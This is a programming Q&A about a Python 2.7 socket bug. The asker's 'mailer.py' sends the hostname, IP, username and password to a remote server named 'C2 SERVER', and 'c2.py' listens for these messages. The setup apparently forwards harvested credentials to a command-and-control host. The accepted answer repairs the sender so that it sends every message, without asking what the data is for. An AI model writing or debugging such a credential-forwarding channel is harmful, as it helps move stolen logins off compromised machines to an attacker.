# Python receiver won't accept more than 1 message per client

Tags: python-2.7, sockets

I wrote this with the intent of sending data collected on one server being sent to an external server. The issue seems to be with c2.py as the mailer.py has no issue with sending the data but c2.py will only output 1 message sent to it from a unique IP.

mailer.py (Sends data to the c2.py sitting on another server)

```
C2 = "C2 SERVER"
C2PORT = 8989

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.settimeout(10) 

def send(ip, usr, pw):
    try:
        try:
            s.connect((C2, C2PORT))
            s.send(socket.gethostname() + " ---> " + ip + " " + usr + " " + pw)
            print "sent"
        except socket.error, ex:
            print ex
    except KeyboardInterrupt:
        s.close()
        sys.close()
```

c2.py (The listener sitting on another server)

```
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('',8989))
s.listen(10)

def nodeRecv():
    while 1:
        try:
            conn, addr = s.accept()
            conn.settimeout(10)
            print conn.recv(65000)
            conn.close()
            print "1"
        except socket.error, ex:
            conn.close()
            print ex

if __name__ == "__main__":
    print "Connected to localhost:8989"
    print "Listening for nodes..."
    nodeRecv()
```

Comment: Look at this answer - https://stackoverflow.com/questions/15958026/getting-errno-9-bad-file-descriptor-in-python-socket, should solve your dilemma.

Answer (score 1, accepted):

You can't reopen the same socket and your your server is closing the connection (`conn.close()`) after receiving all the data you get an error. Move `s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)` into the function and open a new socket:

```
import socket
from time import sleep

C2 = 'localhost'
C2PORT = 8989


def send(ip, usr, pw):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    try:
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        s.connect((C2, C2PORT))
        s.send(socket.gethostname() + " ---> " + ip + " " + usr + " " + pw)
        print "sent"
        sleep(5)

    except KeyboardInterrupt:
        return False

    finally:
        s.close()


for i in ['z', 'x', 'y']:
    send(i, i, i)
```

For more information read this [Question](https://stackoverflow.com/questions/15958026/getting-errno-9-bad-file-descriptor-in-python-socket).